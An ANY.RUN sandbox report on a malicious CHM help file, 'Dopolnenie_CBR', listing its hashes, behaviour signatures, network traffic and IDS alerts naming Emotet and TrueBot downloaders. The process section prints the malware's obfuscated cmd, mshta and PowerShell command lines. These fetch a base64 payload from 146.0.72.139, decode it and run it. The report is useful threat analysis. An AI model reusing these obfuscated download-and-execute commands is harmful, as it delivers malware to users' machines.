analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Dopolnenie_CBR.htm

Full analysis: https://app.any.run/tasks/9873f19e-f69d-464f-babe-65b542d565c2
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: November 15, 2018, 08:20:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
opendir
Indicators:
MIME: application/octet-stream
File info: MS Windows HtmlHelp Data
MD5:

F7E6785E5F6BFEB8AB16A87968B9A172

SHA1:

20055FC3F1DB35B279F15D398914CABA11E5AD9D

SHA256:

77775F1DBFCEB1F1915D2DB067A0A8239DAB771D41084FC89E9478F3995F2498

SSDEEP:

96:tyjcFB7/c4FtSd28IihG3KjA0FQ/kdi0IAQgSctgFXXCRk2cBM:tyetSd2zihG3Kj5B2ciXCm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • cmd.exe (PID: 1012)
      • epreprf.com (PID: 3288)
      • epreprff.com (PID: 1404)
      • epreprff.com (PID: 1460)
      • cmd.exe (PID: 2268)
      • eprepr.com (PID: 3384)
      • cmd.exe (PID: 1720)
      • cmd.exe (PID: 1960)
      • cmd.exe (PID: 3696)
      • cmd.exe (PID: 2936)

    • Changes the autorun value in the registry

      • eprepr.com (PID: 3384)

  • SUSPICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 1012)

    • Reads internet explorer settings

      • hh.exe (PID: 2628)

    • Starts Internet Explorer

      • rundll32.exe (PID: 1388)

    • Starts CMD.EXE for commands execution

      • hh.exe (PID: 2628)
      • mshta.exe (PID: 3192)
      • eprepr.com (PID: 3384)

    • Starts application with an unusual extension

      • cmd.exe (PID: 2268)
      • epreprff.com (PID: 1460)
      • epreprf.com (PID: 3288)

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 2268)
      • epreprf.com (PID: 3288)
      • eprepr.com (PID: 3384)

    • Starts itself from another location

      • cmd.exe (PID: 2268)

    • Creates files in the user directory

      • eprepr.com (PID: 3384)

    • Uses IPCONFIG.EXE to discover IP address

      • cmd.exe (PID: 3696)

    • Creates files in the program directory

      • cmd.exe (PID: 1720)

    • Starts NET.EXE for network exploration

      • cmd.exe (PID: 1960)

    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 1720)

    • Connects to server without host name

      • eprepr.com (PID: 3384)

    • Uses WHOAMI.EXE to obtaining logged on user information

      • cmd.exe (PID: 2936)

  • INFO

    • Changes internet zones settings

      • iexplore.exe (PID: 3568)
      • iexplore.exe (PID: 3656)

    • Modifies the open verb of a shell class

      • rundll32.exe (PID: 1388)

    • Application launched itself

      • iexplore.exe (PID: 3204)
      • iexplore.exe (PID: 3656)
      • iexplore.exe (PID: 3568)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3204)

    • Reads internet explorer settings

      • mshta.exe (PID: 3192)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.chi | Windows HELP Index (81)
.chm | Windows HELP File (18.9)

EXIF

EXE

LanguageCode: English (U.S.)
CHMVersion: 3
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
65
Monitored processes
21
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start rundll32.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs hh.exe no specs cmd.exe no specs mshta.exe cmd.exe epreprff.com no specs epreprff.com no specs epreprf.com eprepr.com cmd.exe no specs systeminfo.exe no specs cmd.exe no specs net.exe no specs cmd.exe no specs ipconfig.exe no specs cmd.exe no specs whoami.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1388"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\Dopolnenie_CBR.htm.chiC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3656"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\Dopolnenie_CBR.htm.chiC:\Program Files\Internet Explorer\iexplore.exe
rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3204"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3656 CREDAT:79873C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3568"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\Dopolnenie_CBR.htm.chiC:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2476"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3568 CREDAT:79873C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2628"C:\Windows\hh.exe" C:\Users\admin\Desktop\Dopolnenie_CBR.chmC:\Windows\hh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1012"C:\Windows\System32\cmd.exe" ,/b,^, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/C,, st%ALLUSERSPROFILE:~8,1%rt msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.72.139/liC:\Windows\System32\cmd.exehh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3192mshta Http://146.0.72.139/liC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2268"C:\Windows\System32\cmd.exe" /c copy C:\\Windows\\System32\\cmd.exe C:\Users\admin\AppData\Local\Temp\\epreprff.com && C:\Users\admin\AppData\Local\Temp\\epreprff.com /c &Set skk= -Encoding&& Set ski= Byte && Set asidfjhfwssss=den -n%ALLUSERSPROFILE:~5,1%ninter&&Set asidfjhfwsss=-n%ALLUSERSPROFILE:~5,1%p -W hid&& Set asidfjhfwsssss=active -c (new-%ALLUSERSPROFILE:~5,1%bj&& Set asidfjhfwss=ect System.Net.WebClie&& Set par5=nt).D%ALLUSERSPROFILE:~5,1%wnl%ALLUSERSPROFILE:~5,1%&& Set asidfjhfwsssssssssssssss=adfile& copy C:\\Windows\\System32\\WiNDOWSPOWerShELl\\v1.0\\pOWErsheLl.ExE C:\Users\admin\AppData\Local\Temp\\epreprf.com& C:\Users\admin\AppData\Local\Temp\\epreprff.com /c C:\Users\admin\AppData\Local\Temp\\epreprf.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('Ht^Tp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\eprepr.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\eprepr.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\eprepr.com $sv; C:\Users\admin\AppData\Local\Temp\\eprepr.com;C:\Windows\System32\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1404C:\Users\admin\AppData\Local\Temp\\epreprff.com /c C:\Users\admin\AppData\Local\Temp\epreprff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 533
Read events
2 197
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
2
Text files
9
Unknown types
2

Dropped files

PID
Process
Filename
Type
3656iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF754D9965E77EFEC3.TMP
MD5:
SHA256:
3656iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
3656iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3568iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF56EE5D05C52AC344.TMP
MD5:
SHA256:
3568iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\favicon[1].ico
MD5:
SHA256:
3568iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3656iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF27702AE7857C80CC.TMP
MD5:
SHA256:
3656iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{66CB4621-E8AF-11E8-BFAB-5254004AAD11}.dat
MD5:
SHA256:
3568iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF141746D6F96A62D1.TMP
MD5:
SHA256:
3568iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{6CC12721-E8AF-11E8-BFAB-5254004AAD11}.dat
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
5
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3288
epreprf.com
GET
200
146.0.72.139:80
http://146.0.72.139/flk
NL
text
136 Kb
suspicious
3192
mshta.exe
GET
200
146.0.72.139:80
http://146.0.72.139/li
NL
html
2.93 Kb
suspicious
3384
eprepr.com
POST
200
146.0.72.188:80
http://146.0.72.188/ipv6/mod/checker_info.php
NL
text
65 b
malicious
3656
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3384
eprepr.com
GET
200
146.0.72.188:80
http://146.0.72.188/ipv6/ipvcheck.php?dns=c4ba3647
NL
text
5 b
malicious
3568
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3568
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3384
eprepr.com
146.0.72.188:80
Hostkey B.v.
NL
malicious
3288
epreprf.com
146.0.72.139:80
Hostkey B.v.
NL
suspicious
3656
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3192
mshta.exe
146.0.72.139:80
Hostkey B.v.
NL
suspicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted

Threats

PID
Process
Class
Message
3288
epreprf.com
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3288
epreprf.com
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
3288
epreprf.com
Misc activity
POLICY [PTsecurity] Executable base64 Payload
3384
eprepr.com
A Network Trojan was detected
MALWARE [PTsecurity] SystemInfo Exfiltration
3384
eprepr.com
A Network Trojan was detected
MALWARE [PTsecurity] SystemInfo Exfiltration
3384
eprepr.com
Potentially Bad Traffic
GPL ATTACK_RESPONSE command completed
3384
eprepr.com
A Network Trojan was detected
ET TROJAN TrueBot/Silence.Downloader Keep-Alive
3384
eprepr.com
Misc activity
SUSPICIOUS [PTsecurity] Possible TrojanDownloader
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Dopolnenie_CBR.htm